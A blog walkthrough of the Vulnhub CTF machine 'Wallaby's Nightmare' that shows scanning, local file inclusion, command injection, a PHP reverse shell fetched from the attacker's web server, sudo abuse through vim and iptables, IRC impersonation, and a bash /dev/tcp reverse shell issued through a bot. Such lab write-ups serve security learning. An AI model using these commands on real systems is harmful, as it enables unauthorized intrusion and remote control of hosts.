Wallaby’s Nightmare – Walkthrough

This segment of my Vulnhub series covers my walkthrough for the “Wallaby’s Nightmare (v1.0.2)” game.

Finding Host and uncover services

As always, I began finding the address of the game:

sudo nmap -sn

In my case, target got assigned IP address Then moved on uncovering services:

sudo nmap -p1-65535 -A -T4 -sS

Target did not expose many services, only three:

Port Service Product Hostname
22 ssh OpenSSH
80 http Apache httpd
6667 irc


For this game I started out investigating the web service. This is the landing page on port 80:

WN - Username registration
Username registration

Inspection of the HTML source did not give away useful hints. Moved on registering myself:

WN - Registered username.png
Registered username

From inspecting the HTML source I found that the Start the CTF link had an interesting GET parameter which could be a candidate for fuzzing attempt:

<a href="/?page=home"><h2>Start the CTF!</h2></a>

Clicking Start the CTF link brought me to:

WN - What the heck.png
All seeing eye


The HTML on this page did not reveal anything interesting either. I started playing with the GET parameter by feeding various input to it. A single quotation mark made the internal security mechanism blacklist my IP:

WN - Blacklisted IP.png
Blacklisted IP

Toying too much with the GET parameter resulted in the target moving the web service to another port. After reissuing my service scan I found that the web service had moved to port 60080:

WN - HolyMoly service moved
Service on the move

Still with the security mechanism in mind, that GET parameter seemed to be the best attack point. I started toying with LFI to see if I could fish out some files. Most often I try to find the passwd file. And I did:
WN - passwd
Some passwd file I found

This seemed promising. Tried to fish out the shadow file too:

No luck, no access. Realized manual procedure was too time consuming. Moved over to fuzzing.

sudo dirb /usr/share/wordlists/dirb/big.txt
WN - Dirb.png

Of the lot discovered only mailer resulted in a page. This is the HTML source of it:

WN - Mailer HTML.png
Mailer HTML

Looked at the comments, this page had an additional GET parameter called mail that caught my eye. I began toying with it and found that it accepted Linux/Cli commands, in this case ls:

WN - Mail paremeter vulnerable
Parameter vulnerable

The ls command revealed the presence of a PHP file. This lead me to believe dropping a PHP shell was doable. Next I tried to find a way to drop a shell:

WN - Looking for Curl
Looking for Curl

Support for Curl found – dropping was doable.

PHP Shell

I prepared my old trusty shelly.php shell by first copying it to current directory:

$ cp /usr/share/webshells/php/php-reverse-shell.php shelly.php

Then tailored it with my IP and listening port:

  • Ip:
  • Port: 7777

Then set up a web server the target could fetch Shelly from. This command was issued from the current directory where I copied Shelly to:

$ php -S

Then I set up a local listener:

$ nc -lvp 7777

Then made the target fetch Shelly. I used the following URL in Firefox:;mv%20shelly.txt%20shelly.php

Then finally I executed the shell, once again in Firefox:

This gave me a shell:

WN - PHP Shell
PHP shell

By just looking at the Sudo information above I found that:

  • waldo doesn’t need password for Vim on a specific file
  • No password for managing iptables was required

Iptables deserved some investigation:

WN - Looking at Iptables
Looking at Iptables rules

The current rule was that all external connections to IRC was to be dropped. I decided to make the IRC server more open:

$ sudo iptables -R INPUT 2 -p tcp --dport 6667 -j ACCEPT

The above command rewrote the second rule to allow TCP connections on port 6667, as seen in the following screenshot:

WN - Iptables enabling IRC
Enabling IRC connections

Messing with IRC

With the IRC service opened I used IRSSI to connect to the service and for issuing the following commands:

/j wallabyschat
WN - Connect IRC
IRC connection

Inside the channel wallabyschat I saw two other users:

WN - Inside Wallabyschat channel
Inside wallabyschat

Going back to main window in IRSSI I did some reconnaissance on the users by using the following commands:

/whois waldo
/whois wallabysbot
WN - IRC Whois

wallabysbot is based on Sopel. Looking for this bot framework on the server:

WN - LS all users.png
Listing some directories

Sopel was found in Wallabys home folder and there was just one module available, a typical run script:

WN - Finding Sopel
Finding Sopel

The script stated you had to be Waldo to run this script. I tried to execute it in IRSSI with this outcome:

WN - Sopel run scipt
IRC fail

Backtracking some steps I recalled finding a script called irssi.sh in waldos home folder. I looked into it in hope of finding something of interest:

WN - Waldo IRSSI script
IRC script

I found that Waldo was using Tmux for his IRC needs. There’s a hitch in his setup. If Tmux went down, so would his IRC connection. Backtracking some more I found that Waldo can edit a specific Apache file using Vim. Vim has got a neat feature that let you run commands. I penned a plan to kill his Tmux session using said feature in Vim. But first I had to find the Tmux process ID:

WN - who cmd
Finding process ID

Then I had to extend my shell so I could use Vim:

$ python -c 'import pty;pty.spawn("/bin/bash")'
WN - Python magic
Python magic

Opening Vim:

sudo -u waldo /usr/bin/vim /etc/apache2/sites-available/000-default.conf

Then issuing kill command using Vim:

[ESC]:!kill 817 [ENTER]
WN - VIM Kill process
Killing process

Waldos IRC connection died:

WN - IRC takeover.png
IRC takeover

Then I took over Waldos identity by just changing my nick:

/nick waldo

Next step was to trick the bot to open a reverse shell hoping it would be running as waldo. First I had to set up yet another listener locally:

$ nc -lvp 8989

Then I opened a reverse connection by using this gem in the .run command:

.run bash -c 'bash -i >& /dev/tcp/ 0>&1'
WN - Wallaby shell
Wallaby shell

It worked. Looking at sudo permissions it seemed I now had all access in the world at my hands. The final part now was to find the flag:

WN - The flag
The flag!


Published by reedphish

I am the best Reed Phish in the entire world!

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